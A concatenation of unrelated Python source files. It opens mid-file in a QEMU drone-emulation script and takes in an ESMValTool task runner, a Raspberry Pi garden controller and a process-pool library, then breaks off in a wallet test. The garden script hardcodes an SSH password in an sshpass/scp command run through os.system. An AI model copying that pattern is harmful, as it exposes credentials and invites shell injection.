self.mobility_model = emulation['arm']['mobility']
self.kernel = emulation['arm']['kernel']
self.image = emulation['arm']['image_sufix']
self.initrd = emulation['arm']['initrd']
self.mac_sufix = emulation['arm']['mac_sufix']
self.tap_interface = emulation['arm']['tap_interface']
self.Mobility = mobility.Mobility(self, self.mobility_model)
def start(self):
self.run()
def run(self):
"""
Runs the emulation of Virtual machines running QEMU
"""
#start core
if self.core:
self.core_topology()
self.configure_batman()
#start dumps
if self.dump:
#get simdir
simdir = str(time.localtime().tm_year) + "_" + str(time.localtime().tm_mon) + "_" + str(time.localtime().tm_mday) + "_" + str(time.localtime().tm_hour) + "_" + str(time.localtime().tm_min)
#createDumps(number_of_nodes, "./reports/" + simdir + "/tracer")
if self.omnet:
self.tcpdump(self.number_of_nodes, "./reports/" + simdir + "/tracer")
if self.core:
self.tcpdump_core(self.number_of_nodes, "./reports/" + simdir + "/tracer")
if self.core:
#pass
sthread = threading.Thread(target=self.server_thread, args=())
sthread.start()
self.configure_bridge()
qemu_nodes = self.spawnQEMU(self.session, self.number_of_nodes)
while True:
time.sleep(0.1)
# shutdown session
logging.info("Simulation finished. Killing all processes")
if self.core:
self.coreemu.shutdown()
os.system("sudo killall xterm")
os.system("chown -R " + username + ":" + username + " ./reports")
def configure_bridge(self):
process = []
for i in range(0,self.number_of_nodes):
shell = self.session.get_node(i+1, CoreNode).termcmdstring(sh="/bin/bash")
command = "ip tuntap add tap0 mode tap"
command += " && ip link add br0 type bridge"
command += " && ip link set br0 up"
command += " && ip link set tap0 up"
command += " && ip link set tap0 master br0"
command += " && ip link set bat0 master br0"
shell += " -c '" + command + "'"
node = subprocess.Popen([
"xterm",
"-e",
shell], stdin=subprocess.PIPE, shell=False)
process.append(node)
def spawnQEMU(self, session, number_of_nodes):
print("Starting QEMU")
nodes = {}
for i in range(0,number_of_nodes):
shell = session.get_node(i+1, CoreNode).termcmdstring(sh="/bin/bash")
command = "qemu-system-aarch64"
command += " -kernel " + self.kernel
command += " -initrd " + self.initrd
command += " -m 1024 -M virt -cpu cortex-a53"
command += " -serial mon:stdio"
command += " -append \"rw root=/dev/vda1 console=ttyAMA0 loglevel=8 rootwait fsck.repair=yes memtest=1\""
command += " -drive file=" + self.image + str(i) + ".img,format=raw,if=sd,id=hd-root"
command += " -device virtio-blk-device,drive=hd-root"
command += " -net nic,macaddr=" + self.mac_sufix + str('{0:0{1}X}'.format(i,2))# + " -net user"
command += " -net tap,ifname=" + self.tap_interface + ",script=no,downscript=no"
command += " -no-reboot"
shell += " -c '" + command + "'"
node = subprocess.Popen([
"xterm",
"-e",
shell], stdin=subprocess.PIPE, shell=False)
nodes["drone" + str(i)] = node
return nodes
|
_task.py | """ESMValtool task definition"""
import contextlib
import datetime
import errno
import logging
import numbers
import os
import pprint
import subprocess
import threading
import time
from multiprocessing import Pool, cpu_count
import psutil
import yaml
logger = logging.getLogger(__name__)
DATASET_KEYS = {
'mip',
}
def which(executable):
"""Find executable in PATH."""
for path in os.environ["PATH"].split(os.pathsep):
if os.access(os.path.join(path, executable), os.X_OK):
return os.path.join(path, executable)
return None
def _get_resource_usage(process, start_time, children=True):
"""Get resource usage."""
# yield header first
entries = [
'Date and time (UTC)',
'Real time (s)',
'CPU time (s)',
'CPU (%)',
'Memory (GB)',
'Memory (%)',
'Disk read (GB)',
'Disk write (GB)',
]
fmt = '{}\t' * len(entries[:-1]) + '{}\n'
yield fmt.format(*entries)
# Compute resource usage
gigabyte = float(2**30)
precision = [1, 1, None, 1, None, 3, 3]
cache = {}
while process.is_running():
try:
if children:
# Include child processes
processes = process.children(recursive=True)
processes.append(process)
else:
processes = [process]
# Update resource usage
for proc in cache:
# Set cpu percent and memory usage to 0 for old processes
if proc not in processes:
cache[proc][1] = 0
cache[proc][2] = 0
cache[proc][3] = 0
for proc in processes:
# Update current processes
cache[proc] = [
proc.cpu_times().user + proc.cpu_times().system,
proc.cpu_percent(),
proc.memory_info().rss / gigabyte,
proc.memory_percent(),
proc.io_counters().read_bytes / gigabyte,
proc.io_counters().write_bytes / gigabyte,
]
except (OSError, psutil.AccessDenied, psutil.NoSuchProcess):
# Try again if an error occurs because some process died
continue
# Create and yield log entry
entries = [sum(entry) for entry in zip(*cache.values())]
entries.insert(0, time.time() - start_time)
entries = [round(entry, p) for entry, p in zip(entries, precision)]
entries.insert(0, datetime.datetime.utcnow())
yield fmt.format(*entries)
@contextlib.contextmanager
def resource_usage_logger(pid, filename, interval=1, children=True):
"""Log resource usage."""
halt = threading.Event()
def _log_resource_usage():
"""Write resource usage to file."""
process = psutil.Process(pid)
start_time = time.time()
with open(filename, 'w') as file:
for msg in _get_resource_usage(process, start_time, children):
file.write(msg)
time.sleep(interval)
if halt.is_set():
return
thread = threading.Thread(target=_log_resource_usage)
thread.start()
try:
yield
finally:
halt.set()
thread.join()
def _py2ncl(value, var_name=''):
"""Format a structure of Python list/dict/etc items as NCL."""
txt = var_name + ' = ' if var_name else ''
if value is None:
txt += '_Missing'
elif isinstance(value, str):
txt += '"{}"'.format(value)
elif isinstance(value, (list, tuple)):
if not value:
txt += '_Missing'
else:
if isinstance(value[0], numbers.Real):
type_ = numbers.Real
else:
type_ = type(value[0])
if any(not isinstance(v, type_) for v in value):
raise ValueError(
"NCL array cannot be mixed type: {}".format(value))
txt += '(/{}/)'.format(', '.join(_py2ncl(v) for v in value))
elif isinstance(value, dict):
if not var_name:
raise ValueError(
"NCL does not support nested dicts: {}".format(value))
txt += 'True\n'
for key in value:
txt += '{}@{} = {}\n'.format(var_name, key, _py2ncl(value[key]))
else:
txt += str(value)
return txt
def write_ncl_settings(settings, filename, mode='wt'):
"""Write a dictionary with generic settings to NCL file."""
logger.debug("Writing NCL configuration file %s", filename)
def _ncl_type(value):
"""Convert some Python types to NCL types."""
typemap = {
bool: 'logical',
str: 'string',
float: 'double',
int: 'int64',
dict: 'logical',
}
for type_ in typemap:
if isinstance(value, type_):
return typemap[type_]
raise ValueError("Unable to map {} to an NCL type".format(type(value)))
lines = []
for var_name, value in sorted(settings.items()):
if isinstance(value, (list, tuple)):
# Create an NCL list that can span multiple files
lines.append('if (.not. isdefined("{var_name}")) then\n'
' {var_name} = NewList("fifo")\n'
'end if\n'.format(var_name=var_name))
for item in value:
lines.append('ListAppend({var_name}, new(1, {type}))\n'
'i = ListCount({var_name}) - 1'.format(
var_name=var_name, type=_ncl_type(item)))
lines.append(_py2ncl(item, var_name + '[i]'))
else:
# Create an NCL variable that overwrites previous variables
lines.append('if (isvar("{var_name}")) then\n'
' delete({var_name})\n'
'end if\n'.format(var_name=var_name))
lines.append(_py2ncl(value, var_name))
with open(filename, mode) as file:
file.write('\n'.join(lines))
file.write('\n')
class AbstractTask(object):
"""Base class for defining task classes"""
def __init__(self, settings, output_dir, ancestors=None):
"""Initialize task."""
self.settings = settings
self.ancestors = [] if ancestors is None else ancestors
self.output_dir = output_dir
self.output_files = None
def flatten(self):
"""Return a flattened set of all ancestor tasks and task itself."""
tasks = set()
for task in self.ancestors:
tasks.update(task.flatten())
tasks.add(self)
return tasks
def run(self, input_files=None):
"""Run task."""
if not self.output_files:
if input_files is None:
input_files = []
for task in self.ancestors:
input_files.extend(task.run())
self.output_files = self._run(input_files)
return self.output_files
def _run(self, input_files):
raise NotImplementedError(
"Method should be implemented by child class")
def str(self):
"""Return a nicely formatted description."""
def _indent(txt):
return '\n'.join('\t' + line for line in txt.split('\n'))
txt = 'settings:\n{}\nancestors:\n{}'.format(
pprint.pformat(self.settings, indent=2),
'\n\n'.join(_indent(str(task)) for task in self.ancestors)
if self.ancestors else 'None',
)
return txt
class DiagnosticError(Exception):
"""Error in diagnostic"""
class DiagnosticTask(AbstractTask):
"""Task for running a diagnostic"""
def __init__(self, script, settings, output_dir, ancestors=None):
"""Initialize"""
super(DiagnosticTask, self).__init__(
settings=settings, output_dir=output_dir, ancestors=ancestors)
self.script = script
self.cmd = self._initialize_cmd(script)
self.log = os.path.join(settings['run_dir'], 'log.txt')
self.resource_log = os.path.join(settings['run_dir'],
'resource_usage.txt')
def _initialize_cmd(self, script):
"""Create a an executable command from script."""
diagnostics_root = os.path.join(
os.path.dirname(__file__), 'diag_scripts')
script_file = os.path.abspath(os.path.join(diagnostics_root, script))
if not os.path.isfile(script_file):
raise DiagnosticError(
"Cannot execute script {} ({}): file does not exist.".format(
script, script_file))
cmd = []
if not os.access(script_file, os.X_OK): # if not executable
extension = os.path.splitext(script)[1].lower()[1:]
if not self.settings['profile_diagnostic']:
executables = {
'py': [which('python')],
'ncl': [which('ncl'), '-n', '-p'],
'r': [which('Rscript')],
}
else:
profile_file = os.path.join(self.settings['run_dir'],
'profile.bin')
executables = {
'py': [which('python'), '-m', 'vmprof', '--lines',
'-o', profile_file],
'ncl': [which('ncl'), '-n', '-p'],
'r': [which('Rscript')],
}
if extension not in executables:
raise DiagnosticError(
"Cannot execute script {} ({}): non-executable file "
"with unknown extension.".format(script, script_file))
cmd = executables[extension]
cmd.append(script_file)
return cmd
def write_settings(self):
"""Write settings to file"""
run_dir = self.settings['run_dir']
if not os.path.exists(run_dir):
os.makedirs(run_dir)
filename = os.path.join(run_dir, 'settings.yml')
with open(filename, 'w') as file:
yaml.safe_dump(self.settings, file)
# If running an NCL script:
if self.script.lower().endswith('.ncl'):
# Also write an NCL file and return the name of that instead.
return self._write_ncl_settings()
return filename
def _write_ncl_settings(self):
"""Write settings to NCL file"""
filename = os.path.join(self.settings['run_dir'], 'settings.ncl')
config_user_keys = {
'run_dir',
'plot_dir',
'work_dir',
'table_dir',
'max_data_filesize',
'output_file_type',
'table_output_file_type',
'log_level',
'write_plots',
'write_netcdf',
'write_table',
}
settings = {'diag_script_info': {}, 'config_user_info': {}}
for key, value in self.settings.items():
if key in config_user_keys:
settings['config_user_info'][key] = value
elif not isinstance(value, dict):
settings['diag_script_info'][key] = value
else:
settings[key] = value
write_ncl_settings(settings, filename)
return filename
def _control_ncl_execution(self, process, lines):
"""Check if an error has occurred in an NCL script.
Apparently NCL does not automatically exit with a non-zero exit code
if an error occurs, so we take care of that here.
"""
ignore_warnings = [
warning.strip()
for warning in self.settings.get('ignore_ncl_warnings', [])
]
errors = ['error:', 'fatal:']
if self.settings['exit_on_ncl_warning']:
errors.append('warning:')
msg = ("An error occurred during execution of NCL script {}, "
"see the log in {}".format(self.script, self.log))
warned = False
for line in lines:
if line.strip() in ignore_warnings:
continue
if 'warning:' in line:
logger.warning("NCL: %s", line)
warned = True
for error in errors:
if error in line:
logger.error(msg)
logger.error("NCL: %s", line)
try:
process.kill()
except OSError: # ignore error if process already exited
pass
else:
logger.error("Killed process.")
raise DiagnosticError(msg)
if warned:
logger.warning(
"There were warnings during the execution of NCL script %s, "
"for details, see the log %s", self.script, self.log)
def _start_diagnostic_script(self, cmd, env, cwd):
"""Start the diagnostic script."""
logger.info("Running command %s", cmd)
logger.debug("in environment\n%s", pprint.pformat(env))
logger.debug("in current working directory: %s", cwd)
logger.info("Writing output to %s", self.output_dir)
logger.info("Writing plots to %s", self.settings['plot_dir'])
logger.info("Writing log to %s", self.log)
rerun_msg = '' if cwd is None else 'cd {}; '.format(cwd)
if env:
rerun_msg += ' '.join('{}="{}"'.format(k, env[k]) for k in env
if k not in os.environ)
rerun_msg += ' ' + ' '.join(cmd)
logger.info("To re-run this diagnostic script, run:\n%s", rerun_msg)
try:
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd=cwd,
env=env)
except OSError as exc:
if exc.errno == errno.ENOEXEC:
logger.error(
"Diagnostic script has its executable bit set, but is "
"not executable. To fix this run:\nchmod -x %s", cmd[0])
logger.error(
"You may also need to fix this in the git repository.")
raise
return process
def _run(self, input_files):
"""Run the diagnostic script."""
if self.script is None: # Run only preprocessor
output_files = []
return output_files
is_ncl_script = self.script.lower().endswith('.ncl')
if is_ncl_script:
input_files = [
f for f in input_files
if f.endswith('.ncl') or os.path.isdir(f)
]
else:
input_files = [
f for f in input_files
if f.endswith('.yml') or os.path.isdir(f)
]
self.settings['input_files'] = input_files
cmd = list(self.cmd)
cwd = None
env = dict(os.environ)
settings_file = self.write_settings()
if self.script.lower().endswith('.py'):
# Set non-interactive matplotlib backend
env['MPLBACKEND'] = 'Agg'
else:
# Make diag_scripts path available to diagostics scripts
env['diag_scripts'] = os.path.join(
os.path.dirname(__file__), 'diag_scripts')
if is_ncl_script:
cwd = os.path.dirname(__file__)
env['settings'] = settings_file
else:
cmd.append(settings_file)
process = self._start_diagnostic_script(cmd, env, cwd)
returncode = None
last_line = ['']
with resource_usage_logger(process.pid, self.resource_log),\
open(self.log, 'at') as log:
while returncode is None:
returncode = process.poll()
txt = process.stdout.read()
txt = txt.decode(encoding='utf-8', errors='ignore')
log.write(txt)
# Check if an error occurred in an NCL script
# Last line is treated separately to avoid missing
# error messages spread out over multiple lines.
lines = txt.split('\n')
if is_ncl_script:
self._control_ncl_execution(process, last_line + lines)
last_line = lines[-1:]
# wait, but not long because the stdout buffer may fill up:
# https://docs.python.org/3.6/library/subprocess.html#subprocess.Popen.stdout
time.sleep(0.001)
if returncode == 0:
return [self.output_dir]
raise DiagnosticError(
"Diagnostic script {} failed with return code {}. See the log "
"in {}".format(self.script, returncode, self.log))
def __str__(self):
"""Get human readable description."""
txt = "{}:\nscript: {}\n{}".format(
self.__class__.__name__,
self.script,
super(DiagnosticTask, self).str(),
)
return txt
def get_flattened_tasks(tasks):
"""Return a set of all tasks and their ancestors in `tasks`."""
return set(t for task in tasks for t in task.flatten())
def get_independent_tasks(tasks):
"""Return a set of independent tasks."""
independent_tasks = set()
all_tasks = get_flattened_tasks(tasks)
for task in all_tasks:
if not any(task in t.ancestors for t in all_tasks):
independent_tasks.add(task)
return independent_tasks
def run_tasks(tasks, max_parallel_tasks=None):
"""Run tasks."""
if max_parallel_tasks == 1:
_run_tasks_sequential(tasks)
else:
_run_tasks_parallel(tasks, max_parallel_tasks)
def _run_tasks_sequential(tasks):
"""Run tasks sequentially"""
n_tasks = len(get_flattened_tasks(tasks))
logger.info("Running %s tasks sequentially", n_tasks)
for task in get_independent_tasks(tasks):
task.run()
def _run_tasks_parallel(tasks, max_parallel_tasks=None):
"""Run tasks in parallel"""
scheduled = get_flattened_tasks(tasks)
running = []
results = []
n_scheduled, n_running = len(scheduled), len(running)
n_tasks = n_scheduled
pool = Pool(processes=max_parallel_tasks)
logger.info("Running %s tasks using at most %s processes", n_tasks,
max_parallel_tasks or cpu_count())
def done(task):
"""Assume a task is done if it not scheduled or running."""
return not (task in scheduled or task in running)
while scheduled or running:
# Submit new tasks to pool
just_scheduled = []
for task in scheduled:
if not task.ancestors or all(done(t) for t in task.ancestors):
result = pool.apply_async(_run_task, [task])
results.append(result)
running.append(task)
just_scheduled.append(task)
for task in just_scheduled:
scheduled.remove(task)
# Handle completed tasks
for task, result in zip(running, results):
if result.ready():
task.output_files = result.get()
running.remove(task)
results.remove(result)
# Wait if there are still tasks running
if running:
time.sleep(0.1)
# Log progress message
if len(scheduled) != n_scheduled or len(running) != n_running:
n_scheduled, n_running = len(scheduled), len(running)
n_done = n_tasks - n_scheduled - n_running
logger.info("Progress: %s tasks running or queued, %s tasks "
"waiting for ancestors, %s/%s done", n_running,
n_scheduled, n_done, n_tasks)
pool.close()
pool.join()
def _run_task(task):
"""Run task and return the result."""
return task.run()
|
smartGarden.py | import threading
from datetime import datetime
from datetime import timedelta
import os
import zipfile
import logging
from GardenModules.luxSensor.luxSensor import LuxSensor
from GardenModules.pump.pump import WaterPump
from GardenModules.soilMoisture.soil import SoilMoisture
from GardenModules.gardenServer.gardenServer import GardenServer
from GardenModules.artificalLight.artificalLight import ArtificialLight
from GardenModules.tempSensor.tempSensor import TempSensor
import GardenModules.prune.prune as prune
import cv2
from flask import Flask, request, render_template
from flask_cors import CORS
from flask_debug import Debug
import sys
import queue
import signal
# Disable logging for api
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
# Constants
WAIT_TIME_SECONDS = 600
EMAIL_TIME_SECONDS = 36000
CAMERA_TIME_SECONDS = 300
WAIT_TIME_PRUNE = 86400
image_count = 0
SHUTDOWN_FLAG = False
app = Flask(__name__, template_folder='/home/pi/Desktop/smartGarden/smartGarden/ControlPanel',
static_folder="/home/pi/Desktop/smartGarden/smartGarden/ControlPanel")
CORS(app)
Debug(app)
def create_folder():
filename = str(datetime.now()).replace(" ", "-")
dateArray = filename.split('-')
ymd = dateArray[0] + "-" + dateArray[1] + "-" + dateArray[2]
try:
os.mkdir("/home/pi/Desktop/smartGarden/smartGarden/images/" + ymd)
except FileExistsError:
pass
finally:
return ymd
def zipdir(path, ziph):
logging.info("zipping path: " + path)
for root, dirs, files in os.walk(path):
logging.info("root: " + root)
for file in files:
ziph.write(os.path.join(root, file))
def send_folder(ymd):
time1 = datetime.now()
logging.info("Zipping File... " + str(datetime.now()))
baseFolder = ymd
baseFolder = "/home/pi/Desktop/smartGarden/smartGarden/images/" + baseFolder
ymd = baseFolder + ".zip"
currentDirectory = os.path.dirname(os.path.realpath(__file__))
os.chdir("/home/pi/Desktop/smartGarden/smartGarden/images")
zf = zipfile.ZipFile(ymd, mode='w', compression=zipfile.ZIP_LZMA)
try:
zipdir(baseFolder, zf)
finally:
zf.close()
logging.info("Sending images...")
try:
scp_command = "SSHPASS='al.EX.91.27' sshpass -e scp " + ymd + " alext@192.168.0.20:D:\\\\smartGarden\\\\Images"
except Exception as e:
logging.warn("There was an error sending the file to Cacutar")
logging.warn(e)
try:
os.system(scp_command)
os.system("rm " + ymd)
# os.system("rm -r " + baseFolder)
os.chdir(currentDirectory)
time2 = datetime.now()
diff = time2 - time1
logging.info("It took (mins, seconds): " + str(divmod(diff.total_seconds(), 60)) + " to transfer " + str(ymd))
except Exception as e:
logging.warn("There was an error deleting the folders and moving back a directory")
logging.warn(e)
def take_pics(ymd, number=1):
for x in range(number):
logging.info("Taking image " + str(x + 1) + " out of " + str(number))
filename = str(datetime.now()).replace(" ", "-")
filename = filename.replace(":", "-")
filename = filename.replace(".", "-")
filename = filename + ".jpg"
# Take image
# old was 800x600
vid_cap = cv2.VideoCapture(0)
vid_cap.set(3, 1280)
vid_cap.set(4, 720)
if not vid_cap.isOpened():
logging.warn("Error opening video device using opencv")
else:
print("Taking picture")
for x in range(10):
ret, image = vid_cap.read()
cv2.imwrite("/home/pi/Desktop/smartGarden/smartGarden/images/" + ymd + "/" + str(filename), image)
vid_cap.release()
# print("Sending picture to: " + "/home/pi/Desktop/smartGarden/smartGarden/images/" + ymd + "/" + str(filename))
# myCmd = 'fswebcam -q -i 0 -r 1280x720 /home/pi/Desktop/smartGarden/smartGarden/images/' + ymd + "/" + str(filename)
# os.system(myCmd)
def run_camera(send_folder):
ymd = create_folder()
if send_folder:
logging.info("Sending folder")
yesterday = datetime.now() - timedelta(days=1)
filename = str(yesterday).replace(" ", "-")
dateArray = filename.split('-')
ymd = dateArray[0] + "-" + dateArray[1] + "-" + dateArray[2]
send_folder(ymd)
ymd = create_folder()
take_pics(ymd)
def camera_thread():
# TODO ADD ANOTHER THREAD FOR SENDING IMAGES TO CACTUAR PC
ymd = create_folder()
timer = threading.Event()
# run_camera(send_folder=False)
send_folder = False
sent_folder = False
while not timer.wait(CAMERA_TIME_SECONDS) and not SHUTDOWN_FLAG:
try:
time = str(datetime.now()).split()
hour = str(time[1].split(':')[0])
except Exception as e:
print("Error parsing date for camera.")
print(e)
if hour == "00" and not sent_folder:
send_folder = True
sent_folder = True
elif hour != "00" and sent_folder:
sent_folder = False
else:
send_folder = False
run_camera(False)
if SHUTDOWN_FLAG:
break
def prune_logs_thread():
# prune.prune("smartGardenLog.txt")
timer = threading.Event()
while not timer.wait(WAIT_TIME_PRUNE) and not SHUTDOWN_FLAG:
# TODO FIX PRUNING
print("Pruning smartGardenLog")
prune.prune("smartGardenLog.txt")
prune("soilLog.txt")
# prune("sunlightLog.txt")
if SHUTDOWN_FLAG:
break
if __name__ == "__main__":
logFile = "/home/pi/Desktop/smartGarden/smartGarden/logs/smartGardenLog.log"
if not os.path.exists(logFile):
with open(logFile, 'w+'):
pass
logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s',
filename=logFile, level=logging.INFO, datefmt='%Y-%m-%dT%H:%M:%S')
sentinel = queue.Queue()
sentinel.put(False)
soilMoistureSensor = SoilMoisture(logging, sentinel)
pump = WaterPump(logging, sentinel, soilMoistureSensor)
luxSensor = None
try:
luxSensor = LuxSensor(logging, sentinel)
except Exception as e:
logging.error("Failed to start lux sensor")
logging.error(e)
tempSensor = TempSensor(logging, sentinel)
artificialLight = ArtificialLight(logging, sentinel)
server = GardenServer(sentinel, pump, luxSensor, soilMoistureSensor, tempSensor)
signal.signal(signal.SIGINT, server.shutDownGarden)
# thread4 = threading.Thread(target=camera_thread)
thread8 = threading.Thread(target=prune_logs_thread)
print("Starting threads at time: " + str(datetime.now()) + "...")
logging.info("Starting threads at time: " + str(datetime.now()) + "...")
pump.start()
if luxSensor is not None:
luxSensor.start()
tempSensor.start()
artificialLight.start()
soilMoistureSensor.start()
server.start()
thread8.daemon = True
thread8.start()
print("""
____ _ ____ _
/ ___| _ __ ___ __ _ _ __| |_ / ___| __ _ _ __ __| | ___ _ __
\___ \| '_ ` _ \ / _` | '__| __| | | _ / _` | '__/ _` |/ _ \ '_ \
___) | | | | | | (_| | | | |_ | |_| | (_| | | | (_| | __/ | | |
|____/|_| |_| |_|\__,_|_| \__| \____|\__,_|_| \__,_|\___|_| |_|
Created by Alexander Taffe
Version 1.0
\n\n\nAll Threads Started!\n\n\n
""")
logging.info("""
____ _ ____ _
/ ___| _ __ ___ __ _ _ __| |_ / ___| __ _ _ __ __| | ___ _ __
\___ \| '_ ` _ \ / _` | '__| __| | | _ / _` | '__/ _` |/ _ \ '_ \
___) | | | | | | (_| | | | |_ | |_| | (_| | | | (_| | __/ | | |
|____/|_| |_| |_|\__,_|_| \__| \____|\__,_|_| \__,_|\___|_| |_|
Created by Alexander Taffe
Version 2.0
\n\n\nAll Threads Started!\n\n\n
""")
server.join()
print("server shutdown")
logging.info("Shut Down Complete!")
sys.exit()
pump.join()
print("Pump thread ended")
# thread4.join()
# print("Thread 4 ended")
artificialLight.join()
print("Artificial light ended")
soilMoistureSensor.join()
print("Soil moisture thread ended")
luxSensor.join()
print("Lux sensor thread ended")
tempSensor.join()
print("Temperature sensor thread ended")
thread8.join()
print("Thread 8 ended")
|
distributors.py | from __future__ import absolute_import
from __future__ import unicode_literals
import Queue
import logging
import threading
import collections
import multiprocessing
from buckshot import errors
from buckshot import lockutils
from buckshot import constants
from buckshot.workers import TaskWorker
from buckshot.tasks import TaskIterator
LOG = logging.getLogger(__name__)
class ProcessPoolDistributor(object):
"""Distributes an input function across multiple processes.
Args:
func: The function to run in each process.
num_processes: The number of worker processes to spawn.
timeout: The maximum amount of time to wait for a result from
a worker process. Default is None (unbounded).
"""
def __init__(self, func, num_processes=None, timeout=None):
self._num_processes = num_processes or constants.CPU_COUNT
self._func = func # Function to distribute across processes
self._timeout = timeout # Timeout for running tasks.
self._lock = threading.Lock()
self._processes = None # Map of pid => Process object.
self._worker = None # Worker object.
self._task_queue = None # Worker tasks
self._result_queue = None # Worker results
self._tasks_in_progress = None # Tasks started with unreturned results
self._task_results_waiting = None # Task results that are waiting to be returned.
@property
def is_started(self):
"""Return True if the worker have been started."""
return bool(self._processes)
@property
def is_completed(self):
"""Return True if all tasks have been picked up and associated results
have been returned to the caller.
"""
if not self.is_started:
return False
elif self._tasks_in_progress:
return False
return True
def _create_and_register_process(self):
process = multiprocessing.Process(target=self._worker)
process.daemon = True # This will die if parent process dies.
process.start()
LOG.info("Created new subprocess: %d", process.pid)
self._processes[process.pid] = process
@lockutils.lock_instance("_lock")
def start(self):
"""Start the worker processes and return self.
* Create an input and output queue for worker processes to receive
tasks and send results.
* Create a task registry so worker processes can identify what
task they are working on.
Note:
This creates Processes with `daemon=True`, so if the parent process
dies the child processes will be killed.
"""
self._processes = {}
self._result_queue = multiprocessing.Queue() # TODO: Should this have a maxsize?
self._task_queue = multiprocessing.Queue(maxsize=self._num_processes)
self._tasks_in_progress = collections.OrderedDict() # Keep track of the order of tasks sent
self._task_results_waiting = {} # task id => Result
self._worker = TaskWorker(
func=self._func,
timeout=self._timeout,
input_queue=self._task_queue,
output_queue=self._result_queue
)
for _ in xrange(self._num_processes):
self._create_and_register_process()
return self
def _send_task(self, task):
self._task_queue.put_nowait(task)
self._tasks_in_progress[task.id] = task
def _flush_result_queue(self):
"""Empty the task result queue and yield all TaskResult objects.
Note:
The first queue access blocks. All following attempts to
retrieve results are non-blocking.
Yields:
TaskResult objects.
"""
yield self._result_queue.get() # blocks
while True:
try:
result = self._result_queue.get_nowait() # non-blocking
except Queue.Empty:
break
yield result
def _recv_results(self):
for result in self._flush_result_queue():
if isinstance(result, errors.SubprocessError):
raise RuntimeError(unicode(result)) # A subprocess died unexpectedly. Shut it down!
if isinstance(result.value, errors.TaskTimeout):
self._handle_task_timeout(result)
LOG.debug("Received result for task: %s", result.task_id)
self._task_results_waiting[result.task_id] = result
def _handle_task_timeout(self, task_timeout):
"""Destroy the process that timed out and create a new one in
its place.
Note:
You MUST pass ``join=True`` to _kill_process or else the
shared Queue may deadlock or become corrupted.
"""
pid = task_timeout.pid
# Kill the associated process so the thread stops.
LOG.info("Subprocess %d timed out. Terminating...", pid)
self._kill_process(pid, join=True)
# Make a new process to replace it.
self._create_and_register_process()
def _map_to_workers(self, iterable, result_getter):
"""Map the arguments in the input `iterable` to the worker processes.
Yield any results that worker processes send back.
Args:
iterable: An iterable collection of argument tuples.
result_getter: A function which pulls a result off of the
worker task queue, and yields and results that are ready
to be sent back to the caller.
"""
if not self.is_started:
raise RuntimeError("Cannot process inputs: must call start() first.")
tasks = TaskIterator(iterable)
task = next(tasks)
while True:
try:
self._send_task(task)
task = next(tasks)
except Queue.Full:
LOG.debug("Worker queue full. Waiting for results.")
for result in result_getter(): # I wish I had `yield from` :(
yield result
except StopIteration:
break
while not self.is_completed:
for result in result_getter():
yield result
@lockutils.lock_instance("_lock")
def imap(self, iterable):
"""Send each argument tuple in `iterable` to a worker process and
yield results.
Args:
iterable: An iterable collection of argument tuples. These tuples
are in the form expected of the work function. E.g., if the
work function signature is ``def foo(x, y)`` the `iterable`
will look like [(1, 2), (3, 4), ...].
Yields:
Results from the work function. The results will be returned in
order of their associated inputs.
"""
def get_results():
"""Get a result from the worker output queue and try to yield
results back to the caller.
This yields results back in the order of their associated tasks.
"""
self._recv_results() # blocks
tasks = self._tasks_in_progress
results = self._task_results_waiting
for task_id in tasks.keys():
if task_id not in results:
break
del tasks[task_id]
result = results.pop(task_id)
yield result.value
for result in self._map_to_workers(iterable, get_results):
yield result
@lockutils.lock_instance("_lock")
def imap_unordered(self, iterable):
"""Send each argument tuple in `iterable` to a worker process and
yield results.
Args:
iterable: An iterable collection of argument tuples. These tuples
are in the form expected of the work function. E.g., if the
work function signature is ``def foo(x, y)`` the `iterable`
will look like [(1, 2), (3, 4), ...].
Yields:
Results from the work function. The results are yielded in the
order they are received from worker processes.
"""
def get_results():
"""Get a result from the worker output queue and try to yield
results back to the caller.
The order of the results are not guaranteed to align with the
order of the input tasks.
"""
self._recv_results() # blocks
while self._task_results_waiting:
task_id, result = self._task_results_waiting.popitem()
del self._tasks_in_progress[task_id]
yield result.value
for result in self._map_to_workers(iterable, get_results):
yield result
def _kill_process(self, pid, join=False):
LOG.debug("Killing subprocess %s.", pid)
process = self._processes.pop(pid)
if join:
process.join()
process.terminate()
def _reset(self):
"""Unsets all instance variables that are set up in start()."""
self._worker = None
self._processes = None
self._task_queue = None
self._result_queue = None
self._tasks_in_progress = None
self._task_results_waiting = None
@lockutils.unlock_instance("_lock")
def stop(self):
"""Kill all child processes and clear results."""
if not self.is_started:
raise RuntimeError("Cannot call stop() before start()")
for pid in self._processes.keys():
self._kill_process(pid)
self._reset() |
wallet_multiwallet.py | #!/usr/bin/env python3
# Copyright (c) 2017-2021 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a syscoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import SyscoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
while True:
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})
